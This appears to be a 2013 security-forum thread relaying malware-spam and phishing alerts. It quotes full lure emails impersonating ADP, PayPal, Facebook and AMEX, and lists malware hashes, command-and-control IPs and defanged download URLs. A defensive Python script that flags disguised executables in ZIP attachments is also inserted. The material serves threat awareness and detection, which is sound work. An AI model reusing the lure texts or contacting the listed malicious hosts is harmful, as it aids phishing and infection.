> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins4.jpg
Elsewhere, the below Pastebin page directs individuals to a Mediafire download. Note that they claim it is “legit”, but the file isn’t theirs and they won’t accept responsibility for any “inconvenience”. Never a good sign, really.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins1.jpg
...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins2.jpg
... VirusTotal currently flagging it at 8/47*. We’re also seeing a number of files on MEGA, which claim to be Bitcoin Generators (with one claiming to offer up 0.06975 mBTC “every couple of hours” in return for filling in some CAPTCHA codes)... An additional file below (also hosted on MEGA) already flags up at 17/47** on VirusTotal, and we also detect this as Trojan.Win32.Generic!BT... trying to go down the fast and easy route ensures there’s a lot to lose too. If you’re late to the Bitcoin party, bandwagon jumping may result in a nasty fall."
* https://www.virustotal.com/en/file/9332d6300c0761476a87d63b5e73a1846387ba72691b26ab924ffb89c357aa24/analysis/

** https://www.virustotal.com/en/file/00ae28fa8dfff8f664c619278dd14f7b93b1a2f96a8c6209ae57e9e1901cff38/analysis/

:mad::mad: :fear:

AplusWebMaster
2013-11-21, 22:47
FYI...

Fake ADP Anti-Fraud Secure Update Spam
- http://threattrack.tumblr.com/post/67663410958/adp-anti-fraud-secure-update-spam
Nov 21, 2013 - "Subjects Seen:
ALERT! From ADP: 2013 Anti-Fraud Secure Update
Typical e-mail details:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have.

Malicious File Name and MD5:
2013 Anti-Fraud Secure Update.zip (7DF767E9225803F5CA6C1ED9D2B5E448)
2013 Anti-Fraud Secure Update.exe (6A9D66DF6AE25A86FCF1BBFB36002D44)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7f5a6916e64b7718d9a679117cc819c7/tumblr_inline_mwmemcErG21r6pupn.png

Tagged: ADP, Upatre.

:mad::fear::mad:

AplusWebMaster
2013-11-22, 13:13
FYI...

Fake WhatsApp SPAM - exposes users to malware ...
- http://www.webroot.com/blog/2013/11/22/fake-whatsapp-voice-message-notification-themed-emails-expose-users-malware/
Nov 22, 2013 - "... intercepted a currently circulating malicious spam campaign impersonating WhatsApp — yet again — in an attempt to trick its users into thinking that they’ve received a voice mail. Once socially engineered users execute the malicious attachment found in the fake emails, their PCs automatically join the botnet operated by the cybercriminal(s) behind the campaign.
Sample screenshot of the spamvertised malicious email:
> https://www.webroot.com/blog/wp-content/uploads/2013/11/WhatsApp_Fake_Rogue_Malicious_Email_Voice_Message_Notification_Social_Engineering_Malware_Malicious_Software_Cybercrime.png
Detection rate for the spamvertised attachment: MD5: 41ca9645233648b3d59cb52e08a4e22a – * ... TrojanDownloader:Win32/Kuluoz.D. Once executed, it phones back to:
hxxp ://103.4.18.215:8080 /460326245047F2B6E405E92260B09AA0E35D7CA2B1
70.32.79.44
84.94.187.245
172.245.44.180
103.4.18.215
172.245.44.2 ...
* https://www.virustotal.com/en/file/e7f8d088049d74cb12b12780abfd4b726174beecc4b49b4e7b7f5e6c4b04cccb/analysis/1384979533/
___

Watch where you’re logging in ...
- http://www.threattracksecurity.com/it-blog/tesco-bank-credit-card-customers-watch-youre-logging/
Nov 22, 2013 - "If you do your online banking with TESCO, or indeed have a credit card with them, you may want to be on the lookout for the following website which is hosting a rather large tally of login pages. The site in question is:
mrqos(dot)com(dot)au/kate/tess/tescr/login(dot)html
and that particular site was flagged not so long ago in the Zone-H defacement mirror, with “KEST” compromising it on or around the 15th of October, 2013.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/tesco0.jpg
Here’s 100 or so identical HTML pages in one directory offering up a TESCO credit card login:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/tesco3.jpg
All of the above pages present end-users with the following login screen:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/tesco4.jpg
The page asks end-users to login to “Tesco bank online banking” with “credit card” mentioned in the top right hand corner. After entering a username, the page asks for more information... you should only ever log in on the homepage of your bank or credit card. Visiting it from URLs in emails or random messages sent your way just won’t cut the mustard – physically type in the URL, ensure there’s a padlock and the connection is encrypted. You won’t find padlocks or encryption on the above pages..."
___

Pokemon X and Y Tumblrs: Warn your Kids
- http://www.threattracksecurity.com/it-blog/pokemon-x-y-tumblrs-warn-kids/
Nov 22, 2013 - "A gentle reminder not to leave your kids alone with their best friend ever, the internet. Pokemon X and Y is by all accounts a raging success, and if the smaller members of your household go Googling for things related to said title, they may well end up on a site such as the below promising a PC download of the new game.
pokemonxetyromemulateur(dot)tumblr(dot)com
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/pokedownload1.jpg
This site intends to direct the end-user to a cookie-cutter blog located at
pokemonxyemulator(dot)blogspot(dot)ro
The site pops a -survey- with offers likely dictated by region. What’s worrying here is if kids arrive on this site given the Pokemon theme, they could well be presented with survey questions asking for personal information alongside the more typical installs (and installs aren’t really something you want to be presenting kids with either).
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/pokedownload2.jpg
In this case, one of the links leads to an iLivid install.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/pokedownload3.jpg
... it mentions a -toolbar- install which is pre-ticked in the next screen... What’s on offer here isn’t a big deal, but there’s no way you can predict what will be on the other end of a survey popup – everything from personal information requests and ringtone offers to Adware and (occasionally) Malware have all been sitting in wait on the other side of that “Complete this” button. While adults may hopefully steer clear of a lot of these antics, any kids going click happy in Pokemon land (or any other themed set of search engine queries) probably won’t be so lucky..."

:mad: :fear:

AplusWebMaster
2013-11-26, 03:23
FYI...

Fake PayPal Spam
- http://threattrack.tumblr.com/post/68070828047/paypal-resolution-of-case-spam
Nov 25, 2013 - "Subjects Seen:
Resolution of case #PP-016-353-161-368
Typical e-mail details:
Transaction ID: 27223374MSB9Y6FV6
Our records indicate that you never responded to requests for additional
information about this claim. We hope you review the attached file and solve the situation amicably.
For more details please see the attached file (Case_9503665.zip)
Sincerely,
Protection Services Department

Malicious File Name and MD5:
Case_9503665.zip (040D3AA61ADB6431576D27E14BA12E43)
Case_.exe (8DB3C24FCD0EF4A660636250D0120B23)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bbfc34678338de568d5f7f9d84a17410/tumblr_inline_mwtvpuDtlR1r6pupn.png

Tagged: PayPal, Upatre
___

Fake HSBC emails - malware
- http://www.webroot.com/blog/2013/11/25/cybercriminals-impersonate-hsbc-fake-payment-e-advice-themed-emails-expose-users-malware/
Nov 25, 2013 - "HSBC customers, watch what you execute on your PCs. A circulating malicious spam campaign attempts to socially engineer you into thinking that you’ve received a legitimate ‘payment e-Advice’. In reality, once you execute the attachment, your PC automatically joins the botnet operated by the cybercriminal(s) behind the campaign.
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/11/HSBC_Fake_Rogue_Malicious_Email_Spam_Spamvertised_Social_Engineering_Malware_Malicious_Software.png
Detection rate for the spamvertised attachment: MD5: 2fbf89a24a43e848b581520d8a1fab27 – * ...Trojan.Win32.Bublik.blgc. Once executed, the sample starts listening on ports 3670 and 6652..."
* https://www.virustotal.com/en/file/1ea24f6fe1dfc8c883da3bd380e1da53f766aa9f3df8eb0ebdd6fb0e8b94182e/analysis/1385042183/
___

.gov, .edu - Phish ...
- http://www.threattracksecurity.com/it-blog/gov-edu-phish-oh/
Nov 25, 2013 - "We’ve noticed a couple of .cn URLs which customers of ANZ will probably want to steer clear of.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz0.jpg
syftec(dot)gov(dot)cn
... appears to be a site about the county-level city Shangyu. One of the URLs on the site is
syftec(dot)gov(dot)cn/images/online/
... which takes users to:
rh(dot)buaa(dot)edu(dot)cn/js/online
... which is a .Edu URL called “China Domestic Research Project for ITER”, with the sub-heading “Key technologies research for remote handling manipulator using in nuclear environment”.
Here’s the frontpage, minus the js/online directory:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz1.jpg
Here’s what is located at the rh(dot)buaa(dot)edu(dot)cn/js/online URL:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz2.jpg
The page asks for name, DOB, address, card number, expiration date and security code. Hitting the log on button will direct users to the genuine ANZ website. The URL has already been blacklisted by Google Safebrowsing:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cnanz4.jpg
What’s interesting here is if the URL forwarding end-users from the .gov site to the .edu page is supposed to be there, or it too has been compromised to direct more users to the ANZ “login”. It’s possible the .gov site once forwarded them to a formerly legitimate page on the .edu portal which has since been compromised. However, the .edu page isn’t on Internet Archive so it’s hard to say one way or the other. What we can say for certain is that customers of ANZ should only log in on the genuine ANZ website*, and that .gov URLs are prime targets..."
* https://www.anz.com/

:mad: :fear:

AplusWebMaster
2013-11-26, 18:54
FYI...

Fake Facebook pwd SPAM - Recoverypassword.zip and Facebook-SecureMessage.exe
- http://blog.dynamoo.com/2013/11/you-requested-new-facebook-password.html
26 Nov 2013 - "This -fake- Facebook message comes with a malicious attachment:
Date: Tue, 26 Nov 2013 04:58:18 +0300 [11/25/13 20:58:18 EST]
From: Facebook [update+hiehdzge@ facebookmail .com]
Subject: You requested a new Facebook password!
facebook
Hello,
You have received a secure message. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
Read your secure message by opening the attachment, Facebook-SecureMessage.zip.
Didn't request this change?
If you didn't request a new password, let us know immediately.
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

Screenshot: https://lh3.ggpht.com/-20l6OoLiEfc/UpSqzbqg9yI/AAAAAAAACSE/yW-Pfq5-JW8/s1600/facebook3.png

The attachment is Recoverypassword.zip which in turn contains a malicious executable Facebook-SecureMessage.exe which has a VirusTotal detection rate of 16/42*. Automated analysis tools... shows attempted connections to developmentinn .com on 38.102.226.252 (Cogent, US) and spotopia .com on 199.229.232.99 (Enzu, US). Note that the servers on those IPs host dozens of legitimate sites and I cannot say for certain if they are all compromised or not."
* https://www.virustotal.com/en-gb/file/34414881de0d3cdd56832bd5ade4609c1091faabd9f5755eff61109be377caa4/analysis/1385474059/

- https://www.virustotal.com/en/ip-address/199.229.232.99/information/
___

Xerox Incoming Fax Spam
- http://threattrack.tumblr.com/post/68163781381/xerox-incoming-fax-spam
Nov 26, 2013 - "Subjects Seen:
INCOMING FAX REPORT : Remote ID: 633-553-5385
Typical e-mail details:
INCOMING FAX REPORT
Date/Time: 11/26/2013 04:51:31 EST
Speed: 17766 bps
Connection time: 07:01
Pages: 3
Resolution: Normal
Remote ID: 633-553-5385
Line number: 633-553-5385
DTMF/DID:
Description: Сost sheet for first half of 2013.pdf

Malicious File Name and MD5:
IncomingFax.zip (A5E6AB0F6ECF230633B91612A79BF875)
IncomingFax.exe (B048E178F86F6DBD54D84F488120BB9B)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d194235ca4bd59fb321f065ff35f21e2/tumblr_inline_mwvl3vV45y1r6pupn.png

Tagged: Xerox, Upatre
___

Something evil on 46.19.139.236
- http://blog.dynamoo.com/2013/11/something-evil-on-4619139236.html
26 Nov 2013 - "46.19.139.236 (Private Layer Inc, Switzerland) seems to be serving up some sort of Java -exploit- kit via injection attacks which is utilising hijacked legitimate domains, but the domains in use seem to rotate pretty quickly and I haven't got a copy of the payload, but VirusTotal has some examples* ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/ip-address/46.19.139.236/information/
___

Fake Loan site delivers adware
- http://www.threattracksecurity.com/it-blog/beware-of-trustfinancial-dot-org/
Nov 26, 2013 - "... a fake loan page from an equally fake financial institution called “Trust Financial Group”.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/02D3B1F566A419CEFACB8E96C52913E1.jpg
Once users visit trustfinancial(dot)org, they are -redirected- to a default page serving a loan decision document. In order for visitors to see its unblurred version, they have to install a “secure loan viewer” application. Unfortunately, users will find out that the name of the program is actually called “Search Smarted and Search Assistor” and is signed by a verified publisher called Access Financial Resources, Inc.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/B98992173625FF8F069029FFC1704ACD.jpg
Here’s another sample that we have acquired:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/36311B015C8950A6322B3B49590EE75C.jpg
A quick search on Google for the name points me to a small company of financial planners in Oklahoma, but I can’t find connections to any legitimate software it’s involved in or to “Trust Financial Group”. We can count on the idea that whoever is behind the bogus page and brand had used the name of a legitimate small financial company to make the certificate appear more authentic, which in turn makes the applications seem legit. Unfortunately, this is -not- the case. The files are not document viewer applications, but they are -adware- programs that, once installed, -inject- ads into search engine results.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/C936F07A4085EBFA62BE550F9F6D03F2.jpg
... Eric Howes, ThreatTrack Security’s Principal Lab Researcher, “The domains used here are all anonymously registered. And while this attack technically isn’t a phishing attack, it is exploiting users’ trust and faith in financial institutions to trick them into installing adware.” Our researchers have further determined that the ads being injected are pulled through the domain, ez-input(dot)info, which was also registered anonymously..."
___

Blackshades Rat usage on the rise...
- http://www.symantec.com/connect/blogs/blackshades-rat-usage-rise-despite-author-s-alleged-arrest
Nov 25, 2013 - "... Blackshades RAT, detected by Symantec products as W32.Shadesrat, will gather passwords and credentials from infected systems, sending them back to the malicious command-and-control (C&C) server. This increase in activity prompted us to investigate the main C&C servers that manage the latest infections. Upon investigation, we found a connection to the Cool Exploit Kit, which has been used to distribute W32.Shadesrat, but also several -other- malware families.
Shadesrat evolution since July 2013:
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%201.png
For the last few years we have seen a spectacular increase of attacks against Web servers using recently discovered vulnerabilities to target industries, think tanks, government institutions and users. In all cases, the attacker’s goal is very clear; to execute a malicious payload on the user’s computer. The attackers managed to do this using different exploit kits. When Symantec observed the increase of W32.Shadesrat infections, we identified hundreds of C&C servers being used to gather credentials from compromised computers. W32.Shadesrat targets a wide variety of credentials including email services, Web services, instant messaging applications, and FTP clients. Spammers looking for new mail credentials, attackers trying to continue their security breaches with access to new servers and services, and attackers looking for specific information to exfiltrate might be interested in this kind of information. During our research, we found that nearly all of the C&C servers have hosted exploit kits at some point, and until the arrest of the author of the Blackhole Exploit Kit and the Cool Exploit Kit, the latter has been the most prevalent. These kits try to exploit different vulnerabilities in the user’s computer to execute a malicious payload and infect them. Underground teams have a wide range of resources to perform their attacks.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%202.png
We also observed that after the arrest of the author of the Blackhole Exploit Kit and Cool Exploit Kit, both exploit kits have nearly disappeared, leaving Neutrino as the new kit of choice.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%203.png
Once an unsuspecting user has been compromised, -multiple- payloads are downloaded and used to retain control by using Remote Administration Tools or downloaders that enable them to install additional malware with new functionalities. The C&C servers also spread the following other malware threats.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/Shadesrat%20and%20Cool%20Exploit%204.png
... The distribution of the threats suggests that the attackers attempted to infect as many computers as possible. The attackers do not seem to have targeted specific people or companies. This demonstrates how complete the threat landscape is, as well as the resources that attackers have at their disposal. Don’t forget to make sure that your software is up-to-date and that your antivirus solution has the latest definitions."

:mad::mad: :fear:

AplusWebMaster
2013-11-27, 18:18
FYI...

Fake ADP SPAM - Reference #274135902580 / Transaction.exe
- http://blog.dynamoo.com/2013/11/adp-reference-274135902580-spam.html
27 Nov 2013 - "Is it Salesforce or ADP? Of course.. it is -neither- ...
Date: Wed, 27 Nov 2013 11:50:07 +0100 [05:50:07 EST]
From: "support@ salesforce .com" [support@ salesforce .com]
Subject: ADP - Reference #274135902580
We were unable to process your recent transaction. Please verify your details and try again.
If the problem persists, contact us to complete your order.
Transaction details are shown in the attached file.
Reference #274135902580
This e-mail has been sent from an automated system.
PLEASE DO NOT REPLY...

Attached is a file Transaction_274135902580.zip which in turn contains a malicious executable named Transaction.exe which has an icon to make it look like a PDF file and a VirusTotal detection rate of 8/48*...
> https://lh3.ggpht.com/-SxwSXmXNPHs/UpX1fXSXObI/AAAAAAAACSY/UNYcz2opuj4/s1600/transaction.png
Malwr reports an attempted connection to seribeau .com on 103.6.196.152 (Exa Bytes Network, Malaysia). This IP has several -hundred- legitimate web sites on it, and it is not possible to determine if these are clean or infected."
* https://www.virustotal.com/en-gb/file/ac234318dd27d51436d0233b5d916538c6630d06f7ddcc7d4b6a4d875de95068/analysis/1385558999/

- https://www.virustotal.com/en/ip-address/103.6.196.152/information/
___

Dun & Bradstreet iUpdate Spam
- http://threattrack.tumblr.com/post/68263874738/dun-bradstreet-iupdate-spam
Nov 27, 2013 - "Subjects Seen:
D&B iUpdate : Company Request Processed
Typical e-mail details:
Thank you,
Your request has been successfully processed by D&B.
All information has been reviewed and validated by D&B.
Please Find your Order Information attached.

Malicious File Name and MD5:
CompanyInfo.zip (22CC978F9A6AEE77E653D7507B35CD65)
CompanyInfo.exe (2F3C1473F8BCF79C645134ED84F5EF62)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b39bb51d432ab6e1d846351c04e8a72a/tumblr_inline_mwxg59IRwc1r6pupn.png

Tagged: Dun & Bradstreet, Upatre
___

Tax Return Accountant’s Letter Spam
- http://threattrack.tumblr.com/post/68262070063/tax-return-accountants-letter-spam
Nov 27, 2013 - "Subjects Seen:
FW: 2012 and 2013 Tax Documents; Accountant’s Letter
Typical e-mail details:
I forward this file to you for review. Please open and view it.
Attached are Individual Income Tax Returns and W-2s for 2012 and 2013, plus an accountant’s letter.

Malicious File Name and MD5:
<e-mail recipient>.zip (BC8FC4D02BB86F957F5AE0818D94432F)
TaxReturn.exe (E85AD4B09201144ACDC04FFC5F708F03)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c645b5f4cba8e18c2243a881fd1fe365/tumblr_inline_mwxeqis2ka1r6pupn.png

Tagged: Tax Return, Upatre
___

Russian Photo Attachment Spam
- http://threattrack.tumblr.com/post/68274420361/russian-photo-attachment-spam
Nov 27, 2013 - "Subjects Seen:
Hello
Typical e-mail details:
Hi
My name is Yulia.
I am from Russia.
Look my photo in attachment.

Malicious File Name and MD5:
DSC_0492(copy).jpg.zip (41B37B08293C1BFE76458FA806796206)
DSC_0492(copy).jpg.exe (AC7CD2087014D9092E48CE465E4F902D)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d590cef1826546d83c7e63b46f2231dd/tumblr_inline_mwxmtdo5Ih1r6pupn.png

Tagged: Photo, Sirefef.

:fear: :mad:
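The lures in the posts above share one shape: a ZIP whose only member is an executable dressed up as a document or photo (Transaction.exe with a PDF icon, DSC_0492(copy).jpg.exe, IncomingFax.exe), and in the Xerox fax lure the description line "Сost sheet" is written with a Cyrillic capital Es in place of the Latin C. The following triage script is an added example, not code from any of the quoted blogs; the ZIP it inspects is constructed in memory (a 64-byte "MZ" stub standing in for a real PE, not a malware sample), and the extension lists are the editor's own choice.

```python
"""Triage a ZIP e-mail attachment for disguised executables (added example)."""
import io
import unicodedata
import zipfile

# Extensions that should never arrive inside a "fax", "invoice" or "photo" ZIP (editor's list).
EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# Decoy halves seen in double extensions such as "photo.jpg.exe" (editor's list).
DECOY_EXT = {".pdf", ".doc", ".docx", ".jpg", ".jpeg", ".png", ".txt", ".eml"}


def scripts_in(name):
    """Set of Unicode script names (first word of the character name) for letters in name."""
    scripts = set()
    for ch in name:
        if ch.isalpha():
            try:
                # e.g. 'CYRILLIC CAPITAL LETTER ES' -> 'CYRILLIC', 'LATIN SMALL LETTER O' -> 'LATIN'
                scripts.add(unicodedata.name(ch).split()[0])
            except ValueError:
                scripts.add("UNKNOWN")
    return scripts


def triage_entry(name, head):
    """Return findings for one archive member given its name and its first bytes."""
    findings = []
    base = name.lower().rsplit("/", 1)[-1]
    exts = ["." + p for p in base.split(".")[1:]]
    if exts and exts[-1] in EXEC_EXT:
        findings.append("executable extension %s" % exts[-1])
    if len(exts) >= 2 and exts[-2] in DECOY_EXT and exts[-1] in EXEC_EXT:
        findings.append("double extension %s%s" % (exts[-2], exts[-1]))
    if head[:2] == b"MZ":
        # PE/DOS magic: an executable no matter what the name or icon claims
        findings.append("PE header (MZ) regardless of name")
    scripts = scripts_in(name)
    if len(scripts) > 1:
        findings.append("mixed scripts in name: %s" % ",".join(sorted(scripts)))
    return findings


def triage_zip(data):
    """Scan every member of a ZIP held in memory; returns {member: [findings]} for flagged members."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)
            findings = triage_entry(info.filename, head)
            if findings:
                report[info.filename] = findings
    return report


def build_sample_zip():
    """Constructed sample archive (not real malware): PE stubs under lure names plus a benign PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("DSC_0492(copy).jpg.exe", b"MZ" + b"\x00" * 62)   # double extension + MZ
        zf.writestr("Transaction.pdf", b"%PDF-1.4\n")                 # benign-looking, benign
        zf.writestr("IncomingFax.scr", b"MZ" + b"\x00" * 62)          # executable extension + MZ
        zf.writestr("\u0421ost sheet.pdf", b"%PDF-1.4\n")             # Cyrillic Es + Latin letters
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in triage_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(findings))
```

Reading the first two bytes of each member catches the Transaction.exe trick (PDF icon on a PE) even if a gateway strips or renames extensions; the mixed-script check is a cheap way to surface homoglyph names such as the Cyrillic "Сost" above, though it will also flag legitimately bilingual filenames and so belongs in a scoring rule rather than a hard block.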

AplusWebMaster
2013-11-28, 17:49
FYI...

Fake Skype voicemail - Trojan SPAM ...
- http://www.theregister.co.uk/2013/11/28/skype_voicemail_alert_spam_flings_zeus_trojan/
28 Nov 2013 - "A spam run of fake Skype voicemail alert emails actually comes packed with malware, a UK police agency warns*. Action Fraud said the zip file attachments come contaminated with a variant of the notorious ZeuS banking Trojan. Messages typically come with the subject line “You received a new message from Skype voicemail service”. The emails contain a copyright notice and a disingenuous warning that "Skype staff will NEVER ask you for your password via email", all in a bid to appear genuine..."
* http://www.actionfraud.police.uk/alert-fake-voicemail-emails-from-skype-contain-virus-nov13

- http://blog.mxlab.eu/2013/11/26/fake-email-you-received-a-new-message-from-skype-voicemail-service-contains-trojan/

:mad: :fear:

AplusWebMaster
2013-12-02, 20:16
FYI...

Fake 'planned outage' SPAM - attachment contains trojan ...
- http://blog.mxlab.eu/2013/12/02/email-regarding-planned-outage-of-mail-server-with-the-instructions-to-save-and-backup-attached-file-contains-trojan/
Dec 2, 2013 - "MX Lab... started to intercept a new trojan distribution campaign by email with the subject “Important update. Please read”. This email is sent from the spoofed address “mail server update” and has the following body:
Dear user!
This is a planned Outage for our MAIL Services on Mon, 02 Dec 2013 11:30:14 +0300
Our MailServer is currently experiencing some problems. It should be working again as usual shortly.
If you want to keep previous saved emails
please download and save your backup from the attached file.
Please do not reply to this message.
This is a mandatory notification containing information about important changes in the products you are using.

Screenshot of the message: http://img.blog.mxlab.eu/2013/20131202_planned_outage.gif

The attached ZIP file has the name saved_mailbox_yoct_F479657BA8.zip and contains the 115 kB file saved_mail_user_id_8349653__random_numbers__6587234.eml. The trojan is known as Trojan/Win32.Zbot, W32/Trojan.RSKY-7175, Win32/PSW.Fareit.A, Trojan.Ransom.RV or Mal/Generic-S. At the time of writing, 7 of the 47 AV engines detected the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 8ff5f6c1e5b368c2e9de2a0d98364f9cae6560ba54874f55779b78a0f487745c
The trojan is capable of downloading files from the internet and according to Malwr it can steal information from local internet browsers and harvest credentials from FTP clients. This last one can perhaps be used to upload a virus or malware to hosts that can use this location for other campaigns.
The trojan will start a new service, make some Windows registry modifications and will make contact with hosts to download a file from:
hxxp ://62.76.45.242/our/1.exe
hxxp ://62.76.42.218/our/1.exe
hxxp ://62.76.45.242/our/2.exe
hxxp ://62.76.42.218/our/2.exe
hxxp ://networksecurityx .hopto .org
The file 1.exe is 369 kB in size and is identified as W32/Trojan.RSKY-7175 or Trojan.Ransom.RV. The file 2.exe couldn’t be downloaded, the host gave us a 404 error. This executable will create a process ihre.exe on an infected system, modifies the Windows registry, changes the firewall policies, installs itself to run when booting the system and collects information to fingerprint the system, performs HTTP requests and starts servers listening on 0.0.0.0 on port 8989, 0.0.0.0 on port 2626 and 0.0.0.0 on port 0. At the time of writing, 2 of the 48 AV engines detected the trojan at Virus Total. Use the Virus Total permalink*** and Malwr permalink**** for more detailed information.
SHA256: 8b9ed72674c49abc1aa0ab1c94a8fa13a1b471c23e799c7cce173a67603cb407."
* https://www.virustotal.com/en/file/8ff5f6c1e5b368c2e9de2a0d98364f9cae6560ba54874f55779b78a0f487745c/analysis/1385977408/

** https://malwr.com/analysis/MmRjZDMzZDI0MjgyNGRjZjk5ODAwYWVhNzI0MGJiMzU/

*** https://www.virustotal.com/en/file/8b9ed72674c49abc1aa0ab1c94a8fa13a1b471c23e799c7cce173a67603cb407/analysis/1385978531/

**** https://malwr.com/analysis/Y2QzOWY1NWIzYzY4NDRhZTlhNjdlMTNkZTJmY2JkODY/

- https://www.virustotal.com/en/ip-address/62.76.45.242/information/

- http://google.com/safebrowsing/diagnostic?site=hopto.org/
"... this site was listed for suspicious activity 695 time(s) over the past 90 days..."
___

Toolbar uses Your System to make BTC ...
- http://blog.malwarebytes.org/fraud-scam/2013/11/potentially-unwanted-miners-toolbar-peddlers-use-your-system-to-make-btc/
Nov 29, 2013 - "Potentially Unwanted Programs, or PUPs as we like to call them, are things like Toolbars, Search Agents, etc. Unnecessary junk for your desktop that usually involves monitoring your surfing/shopping habits and slowing down your system with their sub-par software that ends up hurting you much more than helping. A recent and unfortunate discovery by some of our users revealed that some of these programs do more than just cover your desktop in ads, they also steal your system's resources for mining purposes... we are taking a look at a PUP that installs a Bitcoin miner on the user system, not just for a quick buck but actually written into the software’s EULA. This type of system hijacking is just another way for advertising based software to exploit a user into getting even more cash.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/VictorPost-1024x420.png
... we received a request for assistance from one of our users about a file that was taking up 50 percent of the system resources on their system. After trying to remove it by deleting it, he found that it kept coming back, the filename was “jh1d.exe”... We did some research and found out that the file in question was a Bitcoin Miner known as “jhProtominer”, a popular mining software that runs via the command line. However, it wasn’t the miner recreating its own file and executing but a parent process known as “monitor.exe” . Monitor.exe* was created by a company known as Mutual Public, which is also known as We Build Toolbars, LLC or WBT. We were able to find out the connection between WBT and Mutual Public thanks to an entry in the Sarasota Business Observer:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/WBT_is_MP.png
Another product belonging to Mutual Public is known as Your Free Proxy.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/YourFreeProxy.png
Your Free Proxy uses the Mutual Public Installer (monitor.exe), obtaining it from an Amazon cloud server... We checked out this cloud server and found monitor.exe but also some additional interesting files, notably multiple types of “silent” installers and a folder called “coin-miner”... We at Malwarebytes are putting our foot down and detecting these threats as what they are, giving our users the option to remove them and never look back..."
* https://www.virustotal.com/en/file/caaab1e0b1ece9f5f150b092d3bbce74a3dd573cdfdcf0e8bfbf8966ed66353e/analysis/
File name: vti-rescan
Detection ratio: 1/48
Analysis date: 2013-11-29

:mad: :fear:

AplusWebMaster
2013-12-03, 21:42
FYI...

Fake AMEX SPAM
- http://threattrack.tumblr.com/post/68886754223/american-express-secure-message-spam
Dec 3, 2013 - "Subjects Seen:
Confidential - Secure Message from AMEX
Typical e-mail details:
The security of your personal information is of the utmost importance to American Express, so we have sent the attached as a secure electronic file.
Note: The attached file contains encrypted data.
If you have any questions, please call us at 800-524-3645, option 1. Representatives are available to assist you Monday through Thursday between 8:00 a.m. and 8:00 p.m. ET and Friday between 8:00 a.m. and 6:00 p.m. ET.
The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited.
Thank you,
American Express

Malicious File Name and MD5:
SecureMail.zip (2986FFD9B827B34DCB108923FEA1D403)
SecureMail.exe (7DC5BF7F5F3EAF118C7A6DE6AF921017)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/59723401b83ae64fa575f3c72696dee8/tumblr_inline_mx8op1XMJQ1r6pupn.png

Tagged: American Express, Upatre
___

Fake eFax SPAM
- http://blog.dynamoo.com/2013/12/another-day-another-fake-efax-spam.html
3 Dec 2013 - "These fake eFax spams are getting a bit dull. As you might expect, this one comes with a malicious attachment.
Date: Tue, 3 Dec 2013 15:15:03 -0800 [18:15:03 EST]
From: eFax Corporate [message@ inbound .efax .com]
Subject: Fax transmission: -5219616961-5460126761-20130705352854-84905.zip
Please find attached to this email a facsimile transmission we have just received on your behalf
(Do not reply to this email as any reply will not be read by a real person)

